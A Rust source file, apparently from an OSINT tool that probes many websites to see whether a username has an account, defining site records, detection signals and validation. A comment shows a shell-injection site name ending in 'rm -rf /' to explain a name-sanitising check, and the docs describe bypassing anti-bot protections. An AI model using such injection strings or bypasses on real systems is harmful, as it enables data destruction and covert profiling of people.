Skip to main content

adler_core/
site.rs

//! Site definitions and the multi-signal detection model.
//!
//! A site is a target URL plus a list of [`Signal`]s. Each signal is an
//! independent rule that, when triggered against a response, votes either
//! for the account existing ([`SignalVerdict::Found`]) or not
//! ([`SignalVerdict::NotFound`]). Non-triggering signals stay silent
//! ([`SignalVerdict::Ambiguous`]).
//!
//! Aggregation is **negative-priority**: if any signal votes
//! [`SignalVerdict::NotFound`] the verdict is [`MatchKind::NotFound`];
//! otherwise if any votes [`SignalVerdict::Found`] it is
//! [`MatchKind::Found`]; with no votes at all it is
//! [`MatchKind::Uncertain`].
//!
//! A `NotFound` vote wins over a `Found` vote because negative signals are
//! specific (an exact "user not found" message, a 404, a login redirect)
//! while a bare `200 OK` is weak positive evidence. This matches how
//! Sherlock-style detectors work: a site that always returns 200 and only
//! differentiates via an error string is correctly read as `NotFound` when
//! that string is present, even though the 200 also satisfies a
//! `StatusFound` signal.
22
23use std::fmt;
24
25use serde::{Deserialize, Serialize};
26
27use crate::access::AccessPolicy;
28use crate::check::MatchKind;
29use crate::error::{Error, Result};
30use crate::username::Username;
31
/// One site we can probe for the existence of an account.
///
/// Every field except `name` and `url` is optional in the source JSON
/// (`#[serde(default)]`) and is omitted again on serialisation when it
/// still holds its default value. Semantic invariants the type system
/// cannot express are checked by [`Site::validate`].
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct Site {
    /// Human-readable site name. Doubles as the stable filter key
    /// (case-insensitive) used by CLI `--only` / `--exclude`.
    pub name: String,
    /// URL template containing a `{username}` placeholder.
    pub url: UrlTemplate,
    /// Ordered list of detection signals. Aggregated per the type-level docs.
    /// Optional in source JSON when [`Site::engine`] is set — the engine's
    /// signals are inherited at load time. After
    /// [`crate::Registry`] resolution this vec is always non-empty (or the
    /// site fails `validate`).
    #[serde(default, skip_serializing_if = "Vec::is_empty")]
    pub signals: Vec<Signal>,
    /// One or more usernames known to exist on this site. Consumed by
    /// `adler doctor` to verify the signal list still reports `Found`
    /// for a real account. Accepts either a single string or an array
    /// of strings in JSON; the doctor probes each in declaration order
    /// and passes the present-check if **any** one of them resolves to
    /// `Found`. Listing several is defensive — brand accounts or other
    /// users that the site special-cases (e.g. Instagram's own
    /// `instagram` account) shouldn't false-fail the whole site.
    #[serde(default, skip_serializing_if = "Option::is_none")]
    pub known_present: Option<KnownPresent>,
    /// Username known to *not* exist on this site (optional). When omitted,
    /// the doctor generates a random nonsense username instead.
    #[serde(default, skip_serializing_if = "Option::is_none")]
    pub known_absent: Option<String>,
    /// Optional CSS-selector rules for pulling profile fields (name, bio,
    /// avatar, …) out of a `Found` page. Only applied under `--enrich`.
    #[serde(default, skip_serializing_if = "Vec::is_empty")]
    pub extract: Vec<Extractor>,
    /// Free-form classification tags for scanning a subset of the registry,
    /// e.g. `"social"`, `"dev"`, `"region:ru"`. Matched by CLI `--tag`.
    /// A site with no tags is universal (included unless a `--tag` filter
    /// excludes it). Conventionally lowercase; `axis:value` is just a naming
    /// convention, not enforced.
    #[serde(default, skip_serializing_if = "Vec::is_empty")]
    pub tags: Vec<String>,
    /// Extra HTTP headers to send with the probe (e.g.
    /// `{"X-IG-App-ID": "936619743392459"}` to unlock Instagram's
    /// `web_profile_info` endpoint, or a custom `User-Agent`). Browser
    /// backends apply them via `Network.setExtraHTTPHeaders` before
    /// navigation; the raw-HTTP path doesn't read this yet.
    #[serde(default, skip_serializing_if = "std::collections::BTreeMap::is_empty")]
    pub request_headers: std::collections::BTreeMap<String, String>,
    /// Optional regular expression describing usernames a site will
    /// accept. When set and the scanned username doesn't match, the
    /// site is skipped (the outcome is reported as `Uncertain` with
    /// reason `UsernameNotAllowed`, without issuing any HTTP request).
    /// Saves work AND avoids the false-positive class where a site
    /// 404s on illegal usernames in ways our signal can't tell apart
    /// from a missing account.
    ///
    /// Imported from Sherlock's `regexCheck` field; 95+ sites
    /// upstream carry one (length bounds, character classes, etc.).
    /// [`Site::validate`] test-compiles the pattern with
    /// `regex::Regex`, but a pattern that fails to compile (e.g. one
    /// using look-around, which that crate does not support) does
    /// **not** reject the site: the failure is only logged at DEBUG,
    /// with a message stating that the username gate is disabled for
    /// this site.
    #[serde(default, skip_serializing_if = "Option::is_none")]
    pub regex_check: Option<String>,
    /// Name of a shared [`Engine`] this site inherits from (e.g.
    /// `"Discourse"`, `"vBulletin"`). Forum-software platforms host
    /// thousands of instances with identical detection signatures;
    /// defining the signature once on an engine and inheriting it
    /// keeps the registry small and the cost of a platform-wide
    /// HTML change one fix instead of hundreds.
    ///
    /// At registry-load time the engine fields are merged *under* the
    /// site's own — anything the site declares explicitly (`signals`,
    /// `request_headers`, `regex_check`) wins on
    /// conflict; anything left empty / unset is filled from the
    /// engine. An `engine: "X"` referring to a non-existent X is a
    /// load-time error.
    #[serde(default, skip_serializing_if = "Option::is_none")]
    pub engine: Option<String>,
    /// Characters the site silently drops from the username server-side
    /// before matching — `john.doe` and `johndoe` resolve to the same
    /// account on a site that lists `strip_bad_char: "."`. We pre-strip
    /// at probe time so the URL we issue matches the canonical form
    /// the site uses, avoiding a false `NotFound` on a benign
    /// punctuation variant. Mirrors `WhatsMyName`'s field of the same
    /// name; carried verbatim through `scripts/import_whatsmyname.py`.
    #[serde(default, skip_serializing_if = "Option::is_none")]
    pub strip_bad_char: Option<String>,
    /// HTTP method used to probe this site. Defaults to GET — the vast
    /// majority of sites are GET-probed. A few (Anilist's GraphQL API,
    /// some Discord/Holopin endpoints) only answer to POST.
    #[serde(default, skip_serializing_if = "is_default_method")]
    pub request_method: HttpMethod,
    /// Request body to send when [`Site::request_method`] is POST. The
    /// literal `{username}` placeholder is substituted with the probe
    /// username (same as URL templates). For GraphQL endpoints this
    /// is typically the JSON `{"query":"...","variables":{"name":"{username}"}}`.
    #[serde(default, skip_serializing_if = "Option::is_none")]
    pub request_body: Option<String>,
    /// Specific anti-bot mechanisms the site is known to deploy. A
    /// richer alternative to the flat `bot-protected` tag — knowing
    /// *which* protection a site uses lets future routing pick the
    /// right backend (`Cloudflare` → cloudscraper-style bypass,
    /// `CfFirewall` → full browser, `UserAuth` → skip, …) instead
    /// of the all-or-nothing `bot-protected` decision.
    ///
    /// Independent of [`Site::tags`]: the existing `bot-protected`
    /// tag stays as a back-compat shorthand and routes through the
    /// browser backend exactly as before. When this vector is
    /// non-empty Adler also treats the site as bot-protected
    /// regardless of the tag.
    #[serde(default, skip_serializing_if = "Vec::is_empty")]
    pub protection: Vec<ProtectionKind>,
    /// Disable the site without removing it from the registry.
    /// Disabled sites are skipped by [`crate::Registry::filter`] —
    /// they don't get probed, don't appear in `--list-sites`, and
    /// don't count toward the doctor's tally. Useful for parking
    /// known-broken entries with a reason comment instead of
    /// deleting them outright, so a future contributor can re-enable
    /// the entry by flipping the flag once they've authored a
    /// working signature.
    #[serde(default, skip_serializing_if = "std::ops::Not::not")]
    pub disabled: bool,
    /// Canonical-source link for mirror-style sites. When a site is
    /// a mirror of another (e.g. Nitter ↔ Twitter, Invidious ↔
    /// `YouTube`), `source` carries the name of the primary site this
    /// one mirrors. Lets future UX surface "Twitter is offline,
    /// here's the same account on Nitter" without hand-curated
    /// linkage. Empty / `None` for canonical sites and sites with
    /// no known mirror relationship.
    #[serde(default, skip_serializing_if = "Option::is_none")]
    pub source: Option<String>,
    /// Approximate popularity rank — lower numbers are more popular.
    /// Used by `adler --top N` to scan only the most-popular N sites
    /// (useful for fast checks of high-signal targets). Ranks are
    /// curated, not derived from traffic data: the seed set covers
    /// well-known OSINT-relevant sites where most users have
    /// accounts. Sites without a rank are skipped by `--top N`.
    #[serde(default, skip_serializing_if = "Option::is_none")]
    pub popularity: Option<u32>,
    /// Egress requirement for reaching this site — country and/or IP
    /// type the probe must exit from (see [`AccessPolicy`]). Default
    /// (empty) means no special routing: the request uses the client's
    /// default egress. When constrained and no configured egress fits,
    /// the probe is reported `Uncertain(GeoUnavailable)` rather than
    /// fetched from the wrong location.
    #[serde(default, skip_serializing_if = "AccessPolicy::is_default")]
    pub access: AccessPolicy,
}
179
/// A specific anti-bot mechanism a site is known to deploy. Used to
/// route probes to the right backend (raw HTTP, cloudscraper, full
/// browser) and to inform users what blocks reliable detection.
///
/// Variants are spelled in kebab-case in JSON (`rename_all =
/// "kebab-case"`), e.g. `"cloudflare"`, `"ddos-guard"`,
/// `"cf-js-challenge"`, `"tls-fingerprint"`, `"user-auth"`. The enum
/// is `#[non_exhaustive]`, so code outside this crate must keep a
/// wildcard arm when matching on it.
#[derive(Debug, Clone, Copy, PartialEq, Eq, Serialize, Deserialize)]
#[serde(rename_all = "kebab-case")]
#[non_exhaustive]
pub enum ProtectionKind {
    /// Standard Cloudflare WAF — challenge pages, `cf_clearance`
    /// cookie. Bypassable by cloudscraper-style HTTP-level solvers
    /// (e.g. `FlareSolverr`) without a full browser.
    Cloudflare,
    /// AWS `CloudFront` edge protection. Often UA-strictness only.
    Cloudfront,
    /// `DDoS-Guard` (used by some Russian/CIS hosts). Similar
    /// challenge model to Cloudflare.
    DdosGuard,
    /// Cloudflare's JS-challenge ("I am under attack" mode).
    /// Needs a JS-executing backend.
    CfJsChallenge,
    /// Cloudflare's WAF firewall blocking by signature, requiring
    /// a real browser fingerprint to clear.
    CfFirewall,
    /// JA3/JA4 TLS-fingerprint matching (servers that classify the
    /// client by its TLS handshake shape, not its UA).
    TlsFingerprint,
    /// `Anubis` proof-of-work challenge. Used by codeberg + a
    /// growing number of FOSS projects to discourage scraping.
    Anubis,
    /// Generic captcha challenge (hCaptcha, reCAPTCHA, …). Almost
    /// always blocking — `Uncertain` is the honest answer.
    Captcha,
    /// Trivial UA-strictness: rejects unknown User-Agent strings
    /// but lets through a real-browser UA. Cheapest to bypass.
    UserAgent,
    /// Endpoint requires authentication; no anonymous probe path
    /// exists. Practically unscrapable for OSINT.
    UserAuth,
}
218
/// HTTP method used to probe a site. Only GET and POST are supported.
///
/// Spelled in upper case in JSON (`"GET"` / `"POST"`, via
/// `rename_all = "UPPERCASE"`). The `Default` is [`HttpMethod::Get`].
#[derive(Debug, Clone, Copy, Default, PartialEq, Eq, Serialize, Deserialize)]
#[serde(rename_all = "UPPERCASE")]
pub enum HttpMethod {
    /// Standard GET — the default for ~99% of sites in the registry.
    #[default]
    Get,
    /// POST — for API endpoints that only differentiate accounts via a
    /// body payload (GraphQL queries, form submissions). Pair with
    /// [`Site::request_body`].
    Post,
}
231
232/// serde's `skip_serializing_if` callback contract requires a
233/// reference, so the by-value lint on a 1-byte type doesn't apply.
234#[allow(clippy::trivially_copy_pass_by_ref)]
235fn is_default_method(m: &HttpMethod) -> bool {
236    matches!(m, HttpMethod::Get)
237}
238
/// Shared detection signature template for a family of sites that
/// run the same forum / blog / wiki software (Discourse, vBulletin,
/// `XenForo`, `MediaWiki`, …). Referenced from [`Site::engine`].
///
/// Engines carry the same kinds of fields as a [`Site`] does (just
/// the inheritable ones — there's no per-engine `url`, that comes
/// from the site itself). At registry load, the engine's fields
/// are merged *under* each referring site's own fields: site wins
/// on conflict. The merge itself is [`Engine::merge_into`].
#[derive(Debug, Clone, Default, Serialize, Deserialize)]
#[non_exhaustive]
pub struct Engine {
    /// Default detection signals for sites of this family.
    /// Inherited only when the site itself declares no `signals`.
    #[serde(default, skip_serializing_if = "Vec::is_empty")]
    pub signals: Vec<Signal>,
    /// Default extra HTTP headers (e.g. a User-Agent that the
    /// platform accepts where the browser default gets blocked).
    /// Merged with the site's own headers; site wins per-key.
    #[serde(default, skip_serializing_if = "std::collections::BTreeMap::is_empty")]
    pub request_headers: std::collections::BTreeMap<String, String>,
    /// Default username-validity regex inherited only when the site
    /// itself doesn't declare one. A pattern that does not compile
    /// with `regex::Regex` is not an error: [`Engine::validate`]
    /// only logs it at DEBUG.
    #[serde(default, skip_serializing_if = "Option::is_none")]
    pub regex_check: Option<String>,
}
265
266impl Engine {
267    /// Compile-check the engine's own constraints — the inheritable
268    /// fields are subject to the same validation as a site's would
269    /// be.
270    ///
271    /// # Errors
272    /// Returns [`Error::InvalidSite`] when the engine name is
273    /// empty, a signal carries an empty marker, or any other
274    /// constraint a [`Site::validate`] would also flag.
275    pub fn validate(&self, name: &str) -> Result<()> {
276        if name.trim().is_empty() {
277            return Err(Error::InvalidSite {
278                reason: "engine name is empty".into(),
279            });
280        }
281        for signal in &self.signals {
282            signal.validate().map_err(|reason| Error::InvalidSite {
283                reason: format!("engine {name:?}: {reason}"),
284            })?;
285        }
286        if let Some(pat) = &self.regex_check {
287            if let Err(err) = regex::Regex::new(pat) {
288                // The Rust `regex` crate refuses look-around for DoS
289                // reasons; some upstream registries (Sherlock, WMN)
290                // ship patterns that need it. Downgraded from WARN to
291                // DEBUG: it's a known structural limit, the probe
292                // path falls back gracefully, and the noise dominated
293                // CLI startup.
294                tracing::debug!(
295                    engine = %name, pattern = %pat, error = %err,
296                    "engine regex_check did not compile; gate disabled for inheriting sites",
297                );
298            }
299        }
300        Ok(())
301    }
302
303    /// Fill the inheritable empty / unset fields of `site` from
304    /// this engine. Site fields are authoritative: if the site has
305    /// any signals at all, no engine signals are merged in.
306    /// `request_headers` merge per-key (site wins on per-key
307    /// conflict).
308    pub fn merge_into(&self, site: &mut Site) {
309        if site.signals.is_empty() {
310            site.signals.clone_from(&self.signals);
311        }
312        for (k, v) in &self.request_headers {
313            site.request_headers
314                .entry(k.clone())
315                .or_insert_with(|| v.clone());
316        }
317        if site.regex_check.is_none() {
318            site.regex_check.clone_from(&self.regex_check);
319        }
320    }
321}
322
/// Known-present declaration on a [`Site`].
///
/// In JSON this is `untagged`: a plain string `"torvalds"` deserialises
/// into [`KnownPresent::Single`], an array `["torvalds", "leomessi"]`
/// into [`KnownPresent::Multiple`]. Serialisation preserves the form
/// the site was authored with, so single-username entries stay
/// compact.
#[derive(Debug, Clone, Serialize, Deserialize)]
#[serde(untagged)]
#[non_exhaustive]
pub enum KnownPresent {
    /// Exactly one candidate username.
    Single(String),
    /// A list of candidate usernames; the doctor passes if any resolve
    /// to `Found`. Meant for two or more entries, but the type does
    /// not enforce that: any JSON array — including a one-element or
    /// empty one — deserialises into this variant. The empty list is
    /// rejected later by [`Site::validate`].
    Multiple(Vec<String>),
}
340
341impl KnownPresent {
342    /// View all candidate usernames as a slice, in declaration order.
343    /// Always non-empty for `Single`; may be empty for a hand-authored
344    /// `Multiple([])` (validation rejects that).
345    pub fn as_slice(&self) -> &[String] {
346        match self {
347            Self::Single(s) => std::slice::from_ref(s),
348            Self::Multiple(v) => v.as_slice(),
349        }
350    }
351
352    /// Primary candidate — the first declared username. `Single`
353    /// always has one; `Multiple` may be empty if a contributor wrote
354    /// `[]` (caught by [`Site::validate`]).
355    pub fn primary(&self) -> Option<&str> {
356        self.as_slice().first().map(String::as_str)
357    }
358}
359
360impl From<&str> for KnownPresent {
361    fn from(s: &str) -> Self {
362        Self::Single(s.to_owned())
363    }
364}
365
366impl From<String> for KnownPresent {
367    fn from(s: String) -> Self {
368        Self::Single(s)
369    }
370}
371
/// Upper bound on a site name's length. Names appear in CLI output,
/// CSV columns, and the validate-sites.yml workflow's run-summary
/// table — keeping them short avoids both UI breakage and
/// pathological CI artefacts.
///
/// [`Site::validate`] compares this against `str::len`, i.e. the
/// name's length in bytes. For names that pass `is_safe_site_name`
/// (ASCII only) bytes and characters coincide.
const NAME_MAX_LEN: usize = 80;
377
/// Whether `name` is restricted to characters that are safe to
/// interpolate into shell, CSV, and CLI argument contexts.
///
/// Mirrors the JSON Schema pattern `^[\w][\w .()!/+-]*$` with `\w`
/// read as ASCII-only: the first character must be an ASCII letter,
/// digit, or `_`; every later character may additionally be a space
/// or one of `.()!/+-`. The empty string is rejected.
fn is_safe_site_name(name: &str) -> bool {
    /// Non-word characters tolerated after the first position.
    const EXTRA: &str = " .()!/+-";

    let is_word = |c: char| c == '_' || c.is_ascii_alphanumeric();

    let mut rest = name.chars();
    let starts_with_word = matches!(rest.next(), Some(first) if is_word(first));
    starts_with_word && rest.all(|c| is_word(c) || EXTRA.contains(c))
}
394
/// A rule for extracting one profile field from a page.
///
/// [`Site::validate`] rejects a site whose extractor has a blank
/// `field` or a `selector` that `scraper::Selector::parse` cannot
/// parse.
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct Extractor {
    /// Output field name, e.g. `"avatar"`, `"bio"`, `"name"`.
    /// Must not be empty or whitespace-only.
    pub field: String,
    /// CSS selector locating the element.
    pub selector: String,
    /// Attribute to read (e.g. `"src"`, `"content"`). When omitted, the
    /// element's trimmed text content is used.
    #[serde(default, skip_serializing_if = "Option::is_none")]
    pub attr: Option<String>,
}
407
408impl Site {
409    /// Render the site URL for a given username.
410    ///
411    /// If the site declares [`strip_bad_char`](Site::strip_bad_char),
412    /// those characters are removed from `username` before
413    /// substitution — so a `john.doe` probe against a site that
414    /// lists `strip_bad_char: "."` actually hits the URL for
415    /// `johndoe`, matching the canonical form the site stores
416    /// internally.
417    pub fn url_for(&self, username: &Username) -> String {
418        let raw = username.as_str();
419        match self.strip_bad_char.as_deref() {
420            Some(chars) if !chars.is_empty() && raw.chars().any(|c| chars.contains(c)) => {
421                let stripped: String = raw.chars().filter(|c| !chars.contains(*c)).collect();
422                self.url.substitute(&stripped)
423            }
424            _ => self.url.substitute(raw),
425        }
426    }
427
428    /// Validate semantic invariants the type system can't enforce
429    /// (empty signals list, empty markers, empty status code sets).
430    pub fn validate(&self) -> Result<()> {
431        if self.name.trim().is_empty() {
432            return Err(Error::InvalidSite {
433                reason: "site name is empty".into(),
434            });
435        }
436        // Site names doubled as shell-interpolation values in the
437        // `validate-sites.yml` PR gate; an unsanitised name like
438        // `Foo"; rm -rf /; #` would have broken out of `"$name"`
439        // quoting and run arbitrary commands on the runner. Both the
440        // JSON Schema and this Rust loader enforce a safe character
441        // class (word chars plus a few visual punctuation marks) at
442        // every entry point.
443        if self.name.len() > NAME_MAX_LEN {
444            return Err(Error::InvalidSite {
445                reason: format!(
446                    "site name longer than {NAME_MAX_LEN} chars: {:?}",
447                    self.name
448                ),
449            });
450        }
451        if !is_safe_site_name(&self.name) {
452            return Err(Error::InvalidSite {
453                reason: format!(
454                    "site name {:?} contains characters outside the allowed \
455                     set (word chars, space, `.()!/+-`)",
456                    self.name
457                ),
458            });
459        }
460        if self.signals.is_empty() {
461            return Err(Error::InvalidSite {
462                reason: format!("site {:?}: signals list is empty", self.name),
463            });
464        }
465        for signal in &self.signals {
466            signal.validate().map_err(|reason| Error::InvalidSite {
467                reason: format!("site {:?}: {reason}", self.name),
468            })?;
469        }
470        for extractor in &self.extract {
471            if extractor.field.trim().is_empty() {
472                return Err(Error::InvalidSite {
473                    reason: format!("site {:?}: extractor has an empty field name", self.name),
474                });
475            }
476            if scraper::Selector::parse(&extractor.selector).is_err() {
477                return Err(Error::InvalidSite {
478                    reason: format!(
479                        "site {:?}: invalid CSS selector {:?} for field {:?}",
480                        self.name, extractor.selector, extractor.field
481                    ),
482                });
483            }
484        }
485        if let Some(pat) = &self.regex_check {
486            if let Err(err) = regex::Regex::new(pat) {
487                // Sherlock's regexes occasionally use lookarounds
488                // (e.g. `(?![.-])`), which the Rust `regex` crate
489                // doesn't support — it's a true regular-language
490                // engine for performance + DoS safety. Rather than
491                // reject the whole site over a username-gate the
492                // probe path will simply skip and let the site keep
493                // working at the cost of one wasted probe per
494                // illegal username. Logged at DEBUG (not WARN) — it's
495                // a known structural limit, ~8 sites in the embedded
496                // registry need look-around. The noise dominated CLI
497                // startup; set `ADLER_LOG=debug` to see them again.
498                tracing::debug!(
499                    site = %self.name, pattern = %pat, error = %err,
500                    "regex_check did not compile; username-gate disabled for this site",
501                );
502            }
503        }
504        if let Some(kp) = &self.known_present {
505            if kp.as_slice().is_empty() {
506                return Err(Error::InvalidSite {
507                    reason: format!("site {:?}: known_present is an empty list", self.name),
508                });
509            }
510            for name in kp.as_slice() {
511                if name.trim().is_empty() {
512                    return Err(Error::InvalidSite {
513                        reason: format!(
514                            "site {:?}: known_present contains an empty username",
515                            self.name
516                        ),
517                    });
518                }
519            }
520        }
521        for tag in &self.tags {
522            if tag.trim().is_empty() {
523                return Err(Error::InvalidSite {
524                    reason: format!("site {:?}: tag is empty", self.name),
525                });
526            }
527        }
528        Ok(())
529    }
530}
531
/// URL template containing a `{username}` placeholder.
///
/// Validated at construction: must contain the placeholder and start with
/// `http://` or `https://`. Deserialisation goes through
/// [`UrlTemplate::new`], so a template loaded from JSON is subject to
/// the same checks.
#[derive(Debug, Clone, PartialEq, Eq)]
pub struct UrlTemplate(String);

/// Literal marker inside a [`UrlTemplate`] that is replaced by the
/// probed username.
const PLACEHOLDER: &str = "{username}";
540
541impl UrlTemplate {
542    /// Build a template, validating placeholder and scheme.
543    pub fn new(template: impl Into<String>) -> Result<Self> {
544        let t = template.into();
545        if !t.contains(PLACEHOLDER) {
546            return Err(Error::InvalidSite {
547                reason: format!("url template missing {PLACEHOLDER} placeholder: {t:?}"),
548            });
549        }
550        if !(t.starts_with("http://") || t.starts_with("https://")) {
551            return Err(Error::InvalidSite {
552                reason: format!("url template must start with http(s)://: {t:?}"),
553            });
554        }
555        Ok(Self(t))
556    }
557
558    fn substitute(&self, username: &str) -> String {
559        self.0.replace(PLACEHOLDER, username)
560    }
561
562    /// Borrow the raw template (with placeholder).
563    pub fn as_str(&self) -> &str {
564        &self.0
565    }
566}
567
568impl fmt::Display for UrlTemplate {
569    fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
570        f.write_str(&self.0)
571    }
572}
573
574impl Serialize for UrlTemplate {
575    fn serialize<S: serde::Serializer>(&self, s: S) -> std::result::Result<S::Ok, S::Error> {
576        self.0.serialize(s)
577    }
578}
579
580impl<'de> Deserialize<'de> for UrlTemplate {
581    fn deserialize<D: serde::Deserializer<'de>>(d: D) -> std::result::Result<Self, D::Error> {
582        let raw = String::deserialize(d)?;
583        Self::new(raw).map_err(serde::de::Error::custom)
584    }
585}
586
/// A single piece of evidence about whether an account exists.
///
/// Signals are tagged in JSON by their `kind`, spelled in snake_case,
/// e.g. `{"kind": "status_found", "codes": [200]}` or
/// `{"kind": "body_absent", "text": "Profile not found"}`. New
/// variants will land for Phase 2 length-baseline scoring; the enum is
/// `#[non_exhaustive]` so adding variants is not a breaking change.
#[derive(Debug, Clone, Serialize, Deserialize)]
#[serde(tag = "kind", rename_all = "snake_case")]
#[non_exhaustive]
pub enum Signal {
    /// Votes **`Found`** when the response status is in `codes`.
    StatusFound {
        /// Status codes that vote for existence. Must be non-empty.
        codes: Vec<u16>,
    },
    /// Votes **`NotFound`** when the response status is in `codes`.
    StatusNotFound {
        /// Status codes that vote for non-existence. Must be non-empty.
        codes: Vec<u16>,
    },
    /// Votes **`Found`** when the response body contains `text`.
    BodyPresent {
        /// Substring whose appearance votes for existence. Must be non-empty.
        text: String,
    },
    /// Votes **`NotFound`** when the response body contains `text`.
    BodyAbsent {
        /// Substring whose appearance votes for non-existence (e.g.
        /// `"Profile not found"`). Must be non-empty.
        text: String,
    },
    /// Votes **`NotFound`** when the final URL (post-redirect) contains
    /// `fragment`.
    RedirectAbsent {
        /// Substring that, when present in the final URL, indicates the
        /// account is missing (typically `"/login"` or `"/404"`). Must be
        /// non-empty.
        fragment: String,
    },
}
626
/// Probe data extracted from an HTTP response, fed to each [`Signal`].
///
/// Internal detection plumbing — not part of the public API.
#[derive(Debug)]
pub(crate) struct Probe<'a> {
    /// HTTP status code. Read by the `StatusFound` / `StatusNotFound`
    /// signals.
    pub(crate) status: u16,
    /// Final URL after redirects. Read by the `RedirectAbsent` signal.
    pub(crate) final_url: &'a str,
    /// Decoded response body. Empty string when no body-using signal is configured.
    /// Read by the `BodyPresent` / `BodyAbsent` signals.
    pub(crate) body: &'a str,
}
639
/// What one signal concluded after looking at a probe.
///
/// Produced by [`Signal::evaluate`].
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
pub(crate) enum SignalVerdict {
    /// This signal votes that the account exists.
    Found,
    /// This signal votes that the account does not exist.
    NotFound,
    /// This signal had nothing to say (its trigger condition didn't match).
    Ambiguous,
}
650
651impl Signal {
652    /// True if this signal needs to inspect the response body. Used by the
653    /// client to skip body reads when no signal requires them.
654    pub(crate) fn needs_body(&self) -> bool {
655        matches!(self, Self::BodyPresent { .. } | Self::BodyAbsent { .. })
656    }
657
658    /// Evaluate this signal against a probe and produce a vote.
659    pub(crate) fn evaluate(&self, probe: &Probe<'_>) -> SignalVerdict {
660        match self {
661            Self::StatusFound { codes } => {
662                if codes.contains(&probe.status) {
663                    SignalVerdict::Found
664                } else {
665                    SignalVerdict::Ambiguous
666                }
667            }
668            Self::StatusNotFound { codes } => {
669                if codes.contains(&probe.status) {
670                    SignalVerdict::NotFound
671                } else {
672                    SignalVerdict::Ambiguous
673                }
674            }
675            Self::BodyPresent { text } => {
676                if probe.body.contains(text.as_str()) {
677                    SignalVerdict::Found
678                } else {
679                    SignalVerdict::Ambiguous
680                }
681            }
682            Self::BodyAbsent { text } => {
683                if probe.body.contains(text.as_str()) {
684                    SignalVerdict::NotFound
685                } else {
686                    SignalVerdict::Ambiguous
687                }
688            }
689            Self::RedirectAbsent { fragment } => {
690                if probe.final_url.contains(fragment.as_str()) {
691                    SignalVerdict::NotFound
692                } else {
693                    SignalVerdict::Ambiguous
694                }
695            }
696        }
697    }
698
699    /// Human-readable description of why this signal fired against `probe`,
700    /// for verdict explainability. Only meaningful for a signal that voted
701    /// (i.e. didn't return [`SignalVerdict::Ambiguous`]); the caller filters.
702    pub(crate) fn describe_match(&self, probe: &Probe<'_>) -> String {
703        match self {
704            Self::StatusFound { .. } => format!("HTTP {} (status_found)", probe.status),
705            Self::StatusNotFound { .. } => format!("HTTP {} (status_not_found)", probe.status),
706            Self::BodyPresent { text } => format!("body contains {text:?} (body_present)"),
707            Self::BodyAbsent { text } => format!("body contains {text:?} (body_absent)"),
708            Self::RedirectAbsent { fragment } => {
709                format!("final URL contains {fragment:?} (redirect_absent)")
710            }
711        }
712    }
713
714    fn validate(&self) -> std::result::Result<(), String> {
715        match self {
716            Self::StatusFound { codes } | Self::StatusNotFound { codes } => {
717                if codes.is_empty() {
718                    return Err("status signal codes list is empty".into());
719                }
720            }
721            Self::BodyPresent { text } | Self::BodyAbsent { text } => {
722                if text.is_empty() {
723                    return Err("body signal text is empty".into());
724                }
725            }
726            Self::RedirectAbsent { fragment } => {
727                if fragment.is_empty() {
728                    return Err("redirect signal fragment is empty".into());
729                }
730            }
731        }
732        Ok(())
733    }
734}
735
736/// Aggregate per-signal verdicts into a final [`MatchKind`].
737///
738/// Negative-priority counting: any `NotFound` vote → `NotFound`; otherwise
739/// any `Found` vote → `Found`; no votes at all → `Uncertain`. See the module
740/// docs for why a `NotFound` vote outranks a `Found` vote.
741pub(crate) fn aggregate<I>(verdicts: I) -> MatchKind
742where
743    I: IntoIterator<Item = SignalVerdict>,
744{
745    let mut found = false;
746    let mut not_found = false;
747    for v in verdicts {
748        match v {
749            SignalVerdict::Found => found = true,
750            SignalVerdict::NotFound => not_found = true,
751            SignalVerdict::Ambiguous => {}
752        }
753    }
754    if not_found {
755        MatchKind::NotFound
756    } else if found {
757        MatchKind::Found
758    } else {
759        MatchKind::Uncertain
760    }
761}
762
#[cfg(test)]
mod tests {
    use super::*;

    /// Builds a [`Site`] named "Example" on `https://example.com/{username}`
    /// carrying the supplied signals. All remaining fields are set to
    /// empty / `None` / `false`, a GET request, and the default access policy.
    fn site_with(signals: Vec<Signal>) -> Site {
        let url = UrlTemplate::new("https://example.com/{username}").unwrap();
        Site {
            name: String::from("Example"),
            url,
            signals,
            known_present: None,
            known_absent: None,
            extract: Vec::new(),
            tags: Vec::new(),
            request_headers: std::collections::BTreeMap::new(),
            regex_check: None,
            engine: None,
            strip_bad_char: None,
            request_method: crate::site::HttpMethod::Get,
            request_body: None,
            protection: Vec::new(),
            disabled: false,
            source: None,
            popularity: None,
            access: crate::AccessPolicy::default(),
        }
    }

    /// Shorthand for the fixture most tests need: a site whose only signal
    /// is `StatusFound` on HTTP 200.
    fn status_200_site() -> Site {
        site_with(vec![Signal::StatusFound { codes: vec![200] }])
    }

    // ----- URL templating -------------------------------------------------

    #[test]
    fn url_template_substitutes_placeholder() {
        let site = status_200_site();
        let alice = Username::new("alice").unwrap();
        assert_eq!(site.url_for(&alice), "https://example.com/alice");
    }

    #[test]
    fn url_for_strips_bad_chars_before_substitution() {
        let mut site = status_200_site();
        site.strip_bad_char = Some(".".into());
        let dotted = Username::new("john.doe").unwrap();
        assert_eq!(site.url_for(&dotted), "https://example.com/johndoe");
    }

    #[test]
    fn url_for_strip_bad_char_noop_when_no_match() {
        let mut site = status_200_site();
        site.strip_bad_char = Some(".".into());
        let plain = Username::new("alice").unwrap();
        assert_eq!(site.url_for(&plain), "https://example.com/alice");
    }

    #[test]
    fn url_template_rejects_missing_placeholder() {
        let outcome = UrlTemplate::new("https://example.com/users/");
        assert!(outcome.is_err());
    }

    #[test]
    fn url_template_rejects_bad_scheme() {
        let outcome = UrlTemplate::new("ftp://example.com/{username}");
        assert!(outcome.is_err());
    }

    // ----- Site / signal validation ---------------------------------------

    #[test]
    fn validate_requires_non_empty_signals() {
        let message = site_with(Vec::new()).validate().unwrap_err().to_string();
        assert!(message.contains("signals list is empty"));
    }

    #[test]
    fn validate_rejects_empty_status_codes() {
        let site = site_with(vec![Signal::StatusFound { codes: Vec::new() }]);
        let message = site.validate().unwrap_err().to_string();
        assert!(message.contains("status signal"));
    }

    #[test]
    fn validate_rejects_empty_body_text() {
        let site = site_with(vec![Signal::BodyAbsent {
            text: String::new(),
        }]);
        let message = site.validate().unwrap_err().to_string();
        assert!(message.contains("body signal"));
    }

    #[test]
    fn validate_rejects_empty_redirect_fragment() {
